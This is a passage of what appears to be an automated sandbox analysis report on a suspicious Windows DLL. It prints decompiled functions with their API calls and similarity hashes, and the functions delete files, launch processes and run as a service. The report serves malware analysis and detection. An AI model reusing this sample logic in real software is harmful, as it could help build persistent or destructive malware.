                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandleOpen$Manager
                                                                                                        • String ID:
                                                                                                        • API String ID: 4196757001-0
                                                                                                        • Opcode ID: de9296429c5515099f926dbbcaae1a9376a79223b7e57cd967f6affef5a70725
                                                                                                        • Instruction ID: 442714e3795143dfc4b0e16b54a9507f0e5374b9e262805c5b48b6c08e038364
                                                                                                        • Opcode Fuzzy Hash: de9296429c5515099f926dbbcaae1a9376a79223b7e57cd967f6affef5a70725
                                                                                                        • Instruction Fuzzy Hash: 4C012EB3215319ABC3016EA99C80E7FB3ACEF84694B10413AF902D3381DBB8CC0056A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70988830, Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 59%
                                                                                                        			E70988830(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t6;
				long _t8;
				WCHAR* _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = _a8;
				if(_t14 == 0 || _t13 == 0 || (GetFileAttributesW(_t14) & 0xffffffef) == 0) {
					L5:
					return  *0x7098f6a8(_t14, _t13);
				} else {
					_t6 = StrChrW(0x7098ce14, 0x72);
					_t8 = lstrcmpiW(PathFindFileNameW(_t13), _t6);
					if(_t8 != 0) {
						goto L5;
					} else {
						SetLastError(_t8);
						_push(0);
						_push(0);
						_push(1);
						E709844E0(StrChrW(0x7098cd68, 0x6f), _t14, 0);
						return 0;
					}
				}
			}







                                                                                                        0x70988832
                                                                                                        0x70988837
                                                                                                        0x7098883d
                                                                                                        0x7098889d
                                                                                                        0x709888a8
                                                                                                        0x70988851
                                                                                                        0x7098885e
                                                                                                        0x70988869
                                                                                                        0x70988871
                                                                                                        0x00000000
                                                                                                        0x70988873
                                                                                                        0x70988874
                                                                                                        0x7098887a
                                                                                                        0x7098887c
                                                                                                        0x7098887e
                                                                                                        0x7098888d
                                                                                                        0x7098889a
                                                                                                        0x7098889a
                                                                                                        0x70988871

                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 70988844
                                                                                                        • StrChrW.SHLWAPI(7098CE14,00000072), ref: 7098885E
                                                                                                        • PathFindFileNameW.SHLWAPI(?,00000000), ref: 70988862
                                                                                                        • lstrcmpiW.KERNEL32(00000000), ref: 70988869
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 70988874
                                                                                                        • StrChrW.SHLWAPI(7098CD68,0000006F,?,00000000,00000001,00000000,00000000), ref: 7098888A
                                                                                                          • Part of subcall function 709844E0: RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 709844EA
                                                                                                          • Part of subcall function 709844E0: ShellExecuteExW.SHELL32(0000003C), ref: 70984557
                                                                                                          • Part of subcall function 709844E0: WaitForSingleObject.KERNEL32(?,?), ref: 7098457D
                                                                                                          • Part of subcall function 709844E0: GetExitCodeProcess.KERNEL32 ref: 70984591
                                                                                                          • Part of subcall function 709844E0: CloseHandle.KERNEL32(?), ref: 7098459C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesCloseCodeErrorExecuteExitFindHandleLastMemoryNameObjectPathProcessShellSingleWaitZerolstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 3429411208-0
                                                                                                        • Opcode ID: 6d093a68544d3f0096517d1b9d3dac4f3ac474551458a88361dafa8cf65c770d
                                                                                                        • Instruction ID: 4d2c492b64fdaffa1cb1777c50d0806cfd077b1bf1927b69b8bfeec79f74cb19
                                                                                                        • Opcode Fuzzy Hash: 6d093a68544d3f0096517d1b9d3dac4f3ac474551458a88361dafa8cf65c770d
                                                                                                        • Instruction Fuzzy Hash: E0F0D1737543107AD2202BB59C48F5F722CAF90B25F204429F716E63D2D370980087B6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982F69, Relevance: 9.0, APIs: 6, Instructions: 45fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 88%
                                                                                                        			E70982F69(void* _a16, struct _WIN32_FIND_DATAW _a20, char _a64, short _a608, short _a616) {
				signed char _t11;
				WCHAR* _t19;
				void* _t32;

				do {
					_t11 = _a20.dwFileAttributes;
					if((_t11 & 0x00000010) == 0 && _t11 != 0) {
						_push( &_a64);
						wsprintfW( &_a608, StrChrW(0x7098c658, 0x25));
						_t32 = _t32 + 0x10;
						_t19 = DeleteFileW( &_a616);
						if(_t19 == 0) {
							MoveFileExW( &_a616, _t19, 4);
						}
					}
				} while (FindNextFileW(_a16,  &_a20) != 0);
				FindClose(_a16);
				return 1;
			}






                                                                                                        0x70982f70
                                                                                                        0x70982f70
                                                                                                        0x70982f76
                                                                                                        0x70982f80
                                                                                                        0x70982f94
                                                                                                        0x70982f96
                                                                                                        0x70982fa1
                                                                                                        0x70982fa9
                                                                                                        0x70982fb6
                                                                                                        0x70982fb6
                                                                                                        0x70982fbc
                                                                                                        0x70982fd1
                                                                                                        0x70982fda
                                                                                                        0x70982fec

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098C658,00000025,?,?), ref: 70982F89
                                                                                                        • wsprintfW.USER32 ref: 70982F94
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 70982FA1
                                                                                                        • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 70982FB6
                                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 70982FCB
                                                                                                        • FindClose.KERNEL32(?), ref: 70982FDA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$CloseDeleteMoveNextwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2350977733-0
                                                                                                        • Opcode ID: 8d52e82d17d984bc93859ba6e0b1b7bc1464c02acc8d38358641b94b2e5b9607
                                                                                                        • Instruction ID: 3ff62d78d9ff31b2ca8bc04026b60f43229646857102d7a2c3521ea98e400fb0
                                                                                                        • Opcode Fuzzy Hash: 8d52e82d17d984bc93859ba6e0b1b7bc1464c02acc8d38358641b94b2e5b9607
                                                                                                        • Instruction Fuzzy Hash: 8A0121722183419BD720DF61CC88FEB77BCEBC4754F10091DFA4592380E736D8089662
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A6D0, Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 97%
                                                                                                        			E7098A6D0() {
				int _v4;
				intOrPtr _v12;
				short _v14;
				short _v16;
				short* _t12;
				intOrPtr* _t15;
				short _t18;
				intOrPtr _t26;
				void* _t30;
				signed int _t33;

				_t12 = GetCommandLineW();
				if(_t12 == 0) {
					L20:
					ExitProcess(0);
				}
				_v4 = 0;
				_t30 = CommandLineToArgvW(_t12,  &_v4);
				if(_t30 == 0) {
					L19:
					goto L20;
				}
				_t26 = _v12;
				if(_t26 <= 2) {
					L18:
					LocalFree(_t30);
					goto L19;
				}
				_t33 = 2;
				if(_t26 <= 2) {
					L17:
					goto L18;
				}
				do {
					_t15 =  *((intOrPtr*)(_t30 + _t33 * 4));
					if( *((short*)(_t15 + 2)) != 0) {
						goto L10;
					}
					_v16 =  *_t15;
					_v14 = 0;
					CharLowerW( &_v16);
					_t18 = _v16;
					if(_t18 == 0x66) {
						E7098A5C0(1);
						L15:
						L16:
						goto L17;
					}
					if(_t18 == 0x65) {
						E7098A5C0(0);
						goto L15;
					}
					if(_t18 == 0x75) {
						_push(1);
						E7098A020();
						goto L15;
					}
					_t26 = _v12;
					L10:
					_t33 = _t33 + 1;
				} while (_t33 < _t26);
				goto L16;
			}













                                                                                                        0x7098a6d3
                                                                                                        0x7098a6db
                                                                                                        0x7098a788
                                                                                                        0x7098a78a
                                                                                                        0x7098a78a
                                                                                                        0x7098a6e8
                                                                                                        0x7098a6f6
                                                                                                        0x7098a6fa
                                                                                                        0x7098a787
                                                                                                        0x00000000
                                                                                                        0x7098a787
                                                                                                        0x7098a700
                                                                                                        0x7098a707
                                                                                                        0x7098a780
                                                                                                        0x7098a781
                                                                                                        0x00000000
                                                                                                        0x7098a781
                                                                                                        0x7098a70a
                                                                                                        0x7098a711
                                                                                                        0x7098a77f
                                                                                                        0x00000000
                                                                                                        0x7098a77f
                                                                                                        0x7098a720
                                                                                                        0x7098a720
                                                                                                        0x7098a728
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098a734
                                                                                                        0x7098a739
                                                                                                        0x7098a73e
                                                                                                        0x7098a740
                                                                                                        0x7098a749
                                                                                                        0x7098a764
                                                                                                        0x7098a77b
                                                                                                        0x7098a77e
                                                                                                        0x00000000
                                                                                                        0x7098a77e
                                                                                                        0x7098a74f
                                                                                                        0x7098a76d
                                                                                                        0x00000000
                                                                                                        0x7098a76d
                                                                                                        0x7098a755
                                                                                                        0x7098a774
                                                                                                        0x7098a776
                                                                                                        0x00000000
                                                                                                        0x7098a776
                                                                                                        0x7098a757
                                                                                                        0x7098a75b
                                                                                                        0x7098a75b
                                                                                                        0x7098a75c
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CommandLine$ArgvCharExitFreeLocalLowerProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 788958080-0
                                                                                                        • Opcode ID: df3a559356a81a68da7d72d2d5f4037c2d66d3f593eb4b71c5da7405d42a4ef7
                                                                                                        • Instruction ID: cda545f3184729ef2bb8b142a7c7e3234d97718558b8215467986e445225847b
                                                                                                        • Opcode Fuzzy Hash: df3a559356a81a68da7d72d2d5f4037c2d66d3f593eb4b71c5da7405d42a4ef7
                                                                                                        • Instruction Fuzzy Hash: 0F119D758083029EE3009F18C8C5F6E77F9EB84305F504529E94B863D4E7789C45E663
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985310, Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 52%
                                                                                                        			E70985310() {
				intOrPtr _v0;
				char _v524;
				char _v528;
				short _v536;
				intOrPtr _t10;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t19;
				void* _t30;
				void* _t31;

				_t30 =  &_v524;
				_push(0x20a);
				_push( &_v524);
				L7098BF02();
				_t10 = _v0;
				if(_t10 == 0) {
					_t10 =  *0x7098f5e0; // 0xb52c80
				}
				_push(_t10);
				_t19 = wsprintfW( &_v536, StrChrW(0x7098ca80, 0x22));
				_t13 = _v0;
				_t31 = _t30 + 0xc;
				if(_t13 > 0) {
					_push(_t13);
					wsprintfW(_t31 + 0x14 + _t19 * 2, StrChrW(0x7098ca70, 0x20));
					_t31 = _t31 + 0xc;
				}
				_t14 =  *0x7098f584; // 0x799d88
				_push(_t14);
				_push(0);
				_push(0);
				_push(0);
				return E70985220( &_v528, 1, 0);
			}













                                                                                                        0x70985310
                                                                                                        0x70985316
                                                                                                        0x7098531f
                                                                                                        0x70985320
                                                                                                        0x70985325
                                                                                                        0x7098532e
                                                                                                        0x70985330
                                                                                                        0x70985330
                                                                                                        0x7098533e
                                                                                                        0x70985356
                                                                                                        0x70985358
                                                                                                        0x7098535f
                                                                                                        0x70985364
                                                                                                        0x70985366
                                                                                                        0x70985376
                                                                                                        0x70985378
                                                                                                        0x70985378
                                                                                                        0x7098537b
                                                                                                        0x70985380
                                                                                                        0x70985381
                                                                                                        0x70985383
                                                                                                        0x70985385
                                                                                                        0x709853a1

                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(0000020A,0000020A), ref: 70985320
                                                                                                        • StrChrW.SHLWAPI(7098CA80,00000022,?,?,?,?,0000020A,0000020A), ref: 70985346
                                                                                                        • wsprintfW.USER32 ref: 70985354
                                                                                                        • StrChrW.SHLWAPI(7098CA70,00000020,?,?,0000020A,0000020A), ref: 7098536E
                                                                                                        • wsprintfW.USER32 ref: 70985376
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wsprintf$MemoryZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 3693688802-0
                                                                                                        • Opcode ID: aa9bf33605f75c70d378e17c19165f7f59432fc4df0aa057572f92d7d107481d
                                                                                                        • Instruction ID: eca15b608d50d05565506055cb54d44c558ab8d9b4a6c3a785a7030edf8ad5c2
                                                                                                        • Opcode Fuzzy Hash: aa9bf33605f75c70d378e17c19165f7f59432fc4df0aa057572f92d7d107481d
                                                                                                        • Instruction Fuzzy Hash: FB0188B27543007BE220DB959C86FAF739CDB88704F540525FA45D73D1E674E90487A3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983BC0, Relevance: 7.5, APIs: 5, Instructions: 47memorythreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70983BC0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t9;

				_t9 = _a4 - 1;
				if(_t9 > 0xd) {
					L10:
					SetServiceStatus( *0x7098f3c4, 0x7098f4ec);
					return 0;
				}
				switch( *((intOrPtr*)(( *(_t9 + 0x70983c98) & 0x000000ff) * 4 +  &M70983C84))) {
					case 0:
						 *0x7098f4f0 = 1;
						 *0x7098f4f8 = 0;
						 *0x7098f500 = 0;
						 *0x7098f504 = 0;
						goto L10;
					case 1:
						 *0x7098f4f0 = 7;
						goto L10;
					case 2:
						 *0x7098f4f0 = 4;
						goto L10;
					case 3:
						if(_a8 == 5) {
							_t13 = _a12;
							_t20 = _t19 | 0xffffffff;
							if(_t13 != 0) {
								_t20 =  *(_t13 + 4);
							}
							_t15 = HeapAlloc(GetProcessHeap(), 8, 4);
							if(_t15 != 0) {
								 *_t15 = _t20;
								CloseHandle(CreateThread(0, 0, E70983A80, _t15, 0, 0));
							}
						}
						goto L10;
					case 4:
						goto L10;
				}
			}




                                                                                                        0x70983bc4
                                                                                                        0x70983bc9
                                                                                                        0x70983c6a
                                                                                                        0x70983c76
                                                                                                        0x70983c7f
                                                                                                        0x70983c7f
                                                                                                        0x70983bd6
                                                                                                        0x00000000
                                                                                                        0x70983c42
                                                                                                        0x70983c4c
                                                                                                        0x70983c56
                                                                                                        0x70983c60
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983c2a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983c36
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983be2
                                                                                                        0x70983be8
                                                                                                        0x70983bec
                                                                                                        0x70983bf1
                                                                                                        0x70983bf3
                                                                                                        0x70983bf3
                                                                                                        0x70983c01
                                                                                                        0x70983c09
                                                                                                        0x70983c19
                                                                                                        0x70983c22
                                                                                                        0x70983c22
                                                                                                        0x70983c09
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004), ref: 70983BFA
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70983C01
                                                                                                        • CreateThread.KERNEL32 ref: 70983C1B
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70983C22
                                                                                                        • SetServiceStatus.ADVAPI32(00000000,7098F4EC), ref: 70983C76
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocCloseCreateHandleProcessServiceStatusThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 3654718518-0
                                                                                                        • Opcode ID: eb8f1d482131dbebc28579f7728521b4896eaa480bd1e43d26e66b71314d8112
                                                                                                        • Instruction ID: 6480acd049039ae64ed6099c3a95264f2abe7941bc6fac3ff069dcc399774ce4
                                                                                                        • Opcode Fuzzy Hash: eb8f1d482131dbebc28579f7728521b4896eaa480bd1e43d26e66b71314d8112
                                                                                                        • Instruction Fuzzy Hash: 89113CF3218300ABE3008F6ACC6CB1B36A4F751715F21D569F995AB3E1E3799801AB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709823D0, Relevance: 7.5, APIs: 5, Instructions: 34sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E709823D0(intOrPtr* _a4) {
				intOrPtr* _t15;

				Sleep(0xbb8);
				_t15 = _a4;
				if( *_t15 == 0 &&  *(_t15 + 0x38) != 0) {
					do {
						Sleep(0x7d0);
					} while (GetFileAttributesW( *(_t15 + 0x38)) != 0xffffffff);
					E70981C90(_t15);
					VirtualFree( *(_t15 + 0x24), 0, 0x8000);
					 *(_t15 + 0x24) = 0;
					ExitProcess(0);
				}
				return 0;
			}




                                                                                                        0x709823dd
                                                                                                        0x709823df
                                                                                                        0x709823e6
                                                                                                        0x709823f5
                                                                                                        0x709823fa
                                                                                                        0x70982402
                                                                                                        0x70982408
                                                                                                        0x7098241b
                                                                                                        0x70982423
                                                                                                        0x7098242a
                                                                                                        0x7098242a
                                                                                                        0x70982435

                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 709823DD
                                                                                                        • Sleep.KERNEL32(000007D0), ref: 709823FA
                                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 70982400
                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 7098241B
                                                                                                        • ExitProcess.KERNEL32 ref: 7098242A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Sleep$AttributesExitFileFreeProcessVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4254501734-0
                                                                                                        • Opcode ID: 758526328b954320d211fd7106953c1cbe67de541b16354130e4d4eb6da26835
                                                                                                        • Instruction ID: 527c73f094dbf9770f6b3bf43e0c08fa3cac4445a31c106ca42b099e69c85822
                                                                                                        • Opcode Fuzzy Hash: 758526328b954320d211fd7106953c1cbe67de541b16354130e4d4eb6da26835
                                                                                                        • Instruction Fuzzy Hash: B1F090721483109BD3109B66DC88B8AB3ECAF44724F200919E246926E0C7B4B440CB66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982E55, Relevance: 7.5, APIs: 5, Instructions: 34sleepwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70982E55() {
				struct HWND__* _t1;
				int _t3;
				void* _t7;

				if(_t1 != 0) {
					_t3 = IsWindow(_t1);
					_t1 =  *0x7098f3c8; // 0x0
					if(_t3 != 0) {
						PostMessageW(_t1, 0x10, 0, 0);
						_t1 =  *0x7098f3c8; // 0x0
					}
				}
				_t7 = 0;
				while(_t1 != 0 && IsWindow(_t1) != 0) {
					Sleep(0x3e8);
					_t7 = _t7 + 1;
					if(_t7 < 0xa) {
						_t1 =  *0x7098f3c8; // 0x0
						continue;
					}
					break;
				}
				ExitProcess(0);
			}






                                                                                                        0x70982e60
                                                                                                        0x70982e63
                                                                                                        0x70982e67
                                                                                                        0x70982e6c
                                                                                                        0x70982e75
                                                                                                        0x70982e7b
                                                                                                        0x70982e7b
                                                                                                        0x70982e6c
                                                                                                        0x70982e86
                                                                                                        0x70982e95
                                                                                                        0x70982ea5
                                                                                                        0x70982ea7
                                                                                                        0x70982eab
                                                                                                        0x70982e90
                                                                                                        0x00000000
                                                                                                        0x70982e90
                                                                                                        0x00000000
                                                                                                        0x70982eab
                                                                                                        0x70982eaf

                                                                                                        APIs
                                                                                                        • IsWindow.USER32 ref: 70982E63
                                                                                                        • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 70982E75
                                                                                                        • IsWindow.USER32 ref: 70982E9A
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 70982EA5
                                                                                                        • ExitProcess.KERNEL32 ref: 70982EAF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Window$ExitMessagePostProcessSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 1225241566-0
                                                                                                        • Opcode ID: 2b30e22f70f681074829b295a98c9076e746baf7b24dbc0faaa2818981e7ee95
                                                                                                        • Instruction ID: cba9ff3780b086b8c6db398f20b26496cecec6f77987b78302593529d5eaf0fc
                                                                                                        • Opcode Fuzzy Hash: 2b30e22f70f681074829b295a98c9076e746baf7b24dbc0faaa2818981e7ee95
                                                                                                        • Instruction Fuzzy Hash: 13F0127265830197D71097A6CC89F5F32AD9B08B40F201426F947E73D1DA74E801966D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A7A0, Relevance: 6.0, APIs: 4, Instructions: 49memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E7098A7A0(short* _a4, signed int _a8, intOrPtr* _a12) {
				intOrPtr* _t11;
				char* _t12;
				int _t13;
				int _t17;
				short* _t18;

				_t18 = _a4;
				_t12 = 0;
				asm("sbb esi, esi");
				_t17 =  ~_a8 & 0x0000fde9;
				_t13 = WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, 0, 0, 0, 0);
				if(_t13 > 0) {
					_t3 = _t13 + 1; // 0x1
					_t12 = HeapAlloc(GetProcessHeap(), 8, _t3);
					WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, _t12, _t13, 0, 0);
					_t11 = _a12;
					if(_t11 != 0) {
						 *_t11 = _t13 - 1;
					}
				}
				return _t12;
			}








                                                                                                        0x7098a7a2
                                                                                                        0x7098a7ac
                                                                                                        0x7098a7b7
                                                                                                        0x7098a7ba
                                                                                                        0x7098a7c7
                                                                                                        0x7098a7cb
                                                                                                        0x7098a7cd
                                                                                                        0x7098a7e5
                                                                                                        0x7098a7ee
                                                                                                        0x7098a7f4
                                                                                                        0x7098a7fa
                                                                                                        0x7098a7fd
                                                                                                        0x7098a7fd
                                                                                                        0x7098a7fa
                                                                                                        0x7098a805

                                                                                                        APIs
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,77E34620,00000000,74B04F20,00000000,709832F5,00000000,00000000,00000000), ref: 7098A7C1
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 7098A7D3
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098A7DA
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 7098A7EE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1432973188-0
                                                                                                        • Opcode ID: 9f5e0a4ae91d781ee8aac9d3c3543a55619141ae4ca4d8889f87e6ff223a9f73
                                                                                                        • Instruction ID: 6b95c7b24cf81d042d2f113a72353c2cf4e5d95f8f63d42716a739c238f0d33e
                                                                                                        • Opcode Fuzzy Hash: 9f5e0a4ae91d781ee8aac9d3c3543a55619141ae4ca4d8889f87e6ff223a9f73
                                                                                                        • Instruction Fuzzy Hash: 43F0AFB76443197FE6004BAA8C84F27B7ACEB856B4F210236BA35D32D0DA70EC0556B1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70981420, Relevance: 5.0, APIs: 4, Instructions: 47memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70981420(void* __eflags, short* _a4, short* _a8, intOrPtr _a12) {
				signed int _t13;
				void* _t16;
				void* _t18;

				_t13 = 0;
				_t16 = E7098A7A0(_a4, 0, 0);
				if(_t16 != 0) {
					_t18 = E7098A7A0(_a8, 0, 0);
					if(_t18 != 0) {
						_t13 = E709812E0(_t16, _t18, _a12);
						HeapFree(GetProcessHeap(), 0, _t18);
					}
					HeapFree(GetProcessHeap(), 0, _t16);
				}
				return _t13;
			}






                                                                                                        0x70981426
                                                                                                        0x70981430
                                                                                                        0x70981437
                                                                                                        0x7098144d
                                                                                                        0x70981454
                                                                                                        0x70981468
                                                                                                        0x70981471
                                                                                                        0x70981471
                                                                                                        0x7098147d
                                                                                                        0x70981480
                                                                                                        0x70981485

                                                                                                        APIs
                                                                                                          • Part of subcall function 7098A7A0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,77E34620,00000000,74B04F20,00000000,709832F5,00000000,00000000,00000000), ref: 7098A7C1
                                                                                                          • Part of subcall function 7098A7A0: GetProcessHeap.KERNEL32(00000008,00000001), ref: 7098A7D3
                                                                                                          • Part of subcall function 7098A7A0: HeapAlloc.KERNEL32(00000000), ref: 7098A7DA
                                                                                                          • Part of subcall function 7098A7A0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 7098A7EE
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098146A
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70981471
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70981476
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098147D
